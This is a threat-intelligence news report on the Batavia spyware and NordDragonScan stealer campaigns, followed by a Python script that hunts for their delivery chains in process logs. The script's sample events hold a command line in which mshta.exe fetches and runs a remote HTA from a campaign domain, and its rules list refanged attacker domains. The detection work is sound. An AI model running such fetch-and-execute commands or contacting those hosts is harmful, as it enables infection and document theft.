Russian organizations have fallen victim to a sophisticated cyber espionage campaign that deploys a previously unknown Windows spyware dubbed Batavia.
Kaspersky, a leading cybersecurity firm, has identified the campaign, which has been active since July 2024.
“The attack commences with deceptive emails containing malicious links, disguised as contract agreements,” stated the Russian cybersecurity company. “The primary objective of the attack is to infect organizations with the newly discovered Batavia spyware, which is designed to pilfer internal documents.”
The emails originate from the domain “oblast-ru[.]com,” allegedly controlled by the threat actors, leading recipients to download an archive file containing a Visual Basic Encoded script (.VBE).
Upon execution, the script gathers information about the compromised system and sends it to a remote server. Subsequently, a Delphi-written executable is retrieved from the server for further malicious activities.
The malware masquerades as a fake contract to distract victims while silently collecting system logs, office documents, and screenshots. It also extends its data exfiltration capabilities to removable devices connected to the compromised host.
In addition, the Delphi malware has the ability to download another payload targeting a wider range of file types for further data theft, including images, emails, presentations, and text documents.
The stolen data is transmitted to a different domain (“ru-exchange[.]com”), where an unknown executable is downloaded as a fourth-stage payload to escalate the attack.
Telemetry data from Kaspersky reveals that more than 100 users in several organizations have been targeted with phishing emails over the past year.
“Following the attack, Batavia exfiltrates the victim’s documents along with details such as installed programs, drivers, and operating system components,” Kaspersky noted.
Meanwhile, Fortinet FortiGuard Labs has uncovered a malicious campaign distributing a Windows stealer malware named NordDragonScan. The initial infection vector is suspected to be a phishing email containing a link that triggers the download of a RAR archive.
“NordDragonScan conducts an in-depth scan of the host, copying documents, harvesting Chrome and Firefox profiles, and capturing screenshots,” said security researcher Cara Lin.
Contained within the archive is a Windows shortcut (LNK) file that employs “mshta.exe” to execute a malicious HTML Application (HTA) from a remote server. This leads to the retrieval of a benign decoy document while a malicious .NET payload is deployed surreptitiously.
NordDragonScan establishes communications with a remote server (“kpuszkiev[.]com”), achieves persistence by altering Windows Registry settings, and conducts extensive reconnaissance to steal sensitive data, which is then exfiltrated back to the server via HTTP POST requests.
“The RAR file contains LNK calls that trigger mshta.exe to run a malicious HTA script, displaying a decoy document in Ukrainian,” explained Lin. “Ultimately, it silently installs its payload in the background. NordDragonScan is capable of scanning the host, taking screenshots, extracting documents and PDFs, and harvesting Chrome and Firefox profiles.”
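The two delivery chains described above share observable traits a defender can hunt for in process-creation telemetry: a .VBE script launched by a script host (Batavia) and mshta.exe pulling an HTA from a remote URL (NordDragonScan), plus the three domains named in the article. The following Python is an added example, not code from Kaspersky, Fortinet or the article; it assumes a simplified "parent|image|cmdline" event format and uses constructed sample events rather than real telemetry.

```python
"""Hunt for the Batavia (.VBE) and NordDragonScan (remote HTA via mshta.exe) delivery
chains in process-creation events. Example detection logic, not vendor code."""
import re

# Domains quoted (defanged) in the article; refanged here so they can be matched.
DEFANGED_DOMAINS = ["oblast-ru[.]com", "ru-exchange[.]com", "kpuszkiev[.]com"]

def refang(domain):
    """Turn a defanged indicator like 'example[.]com' into a matchable hostname."""
    return domain.replace("[.]", ".").lower()

KNOWN_DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}

# Constructed sample events in the assumed "parent|image|cmdline" form (not real logs).
SAMPLE_EVENTS = [
    r"explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe https://kpuszkiev.com/inv.hta",
    r"explorer.exe|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\u\AppData\Local\Temp\contract.vbe",
    r"explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe C:\Program Files\Vendor\setup.hta",
    r"services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs",
]

URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
VBE_RE = re.compile(r"\S+\.vbe\b", re.IGNORECASE)

def host_of(url):
    """Extract the hostname from a URL found on a command line."""
    return re.sub(r"^https?://", "", url, flags=re.IGNORECASE).split("/")[0].lower()

def classify(event):
    """Return the names of the rules an event triggers (empty list if nothing fires)."""
    _parent, image, cmdline = event.split("|", 2)
    exe = image.rsplit("\\", 1)[-1].lower()
    hits = []
    # NordDragonScan: LNK -> mshta.exe fetching an HTA from a remote server.
    if exe == "mshta.exe" and URL_RE.search(cmdline):
        hits.append("mshta_remote_hta")
    # Batavia: a .VBE script run through a Windows script host.
    if exe in {"wscript.exe", "cscript.exe"} and VBE_RE.search(cmdline):
        hits.append("vbe_script_execution")
    # Either campaign: command line references a domain the article attributes to the actors.
    if any(host_of(m.group(0)) in KNOWN_DOMAINS for m in URL_RE.finditer(cmdline)):
        hits.append("known_campaign_domain")
    return hits

def scan(events):
    """Map event index -> triggered rules, keeping only events that fired something."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}
```

Note that the local-HTA event is deliberately left unflagged here to keep the rule aligned with the remote fetch the article describes; a stricter environment may choose to alert on any mshta.exe launch from explorer.exe.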